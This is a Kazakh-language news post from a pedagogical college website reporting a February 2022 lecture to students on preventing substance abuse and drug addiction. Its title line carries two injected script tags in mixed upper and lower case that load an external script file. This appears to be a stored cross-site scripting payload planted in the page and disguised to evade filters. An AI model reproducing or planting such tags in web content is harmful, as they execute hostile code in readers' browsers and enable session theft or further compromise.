ЕСІРТКІДЕН АУЛАҚ БОЛ!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.02.2022

2022 жылдың 17 ақпан күні  Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің психологі Мұханбетжанова Айым Қуандыққызы және оқу орнының медбикелері Хасенова Жұмабике Қапарқызы  мен Нұрғалиева Ләйлә Еслямқызы «Ағылшын» бөлімінің І курс студенттеріне «Токсикомания мен наркоманияның алдын алу» тақырыбында дәріс оқыды. Лекция барысында нашақорлық пен есірткінің зияны мен салдары айтылды. Токсикоманиямен айналысатын адамдардың қандай ауруларға шалдығатындығы жайлы ақпарат берілді. Сондай-ақ білім алушылар Қазақстан Республикасындағы заңнамаға сәйкес  есірткі контрабандасымен айналысқаны үшін берілетін жаза туралы мәлімет алды.

Просмотров: 455


Пікір қосу



Деректерді қолтаңбаға қосу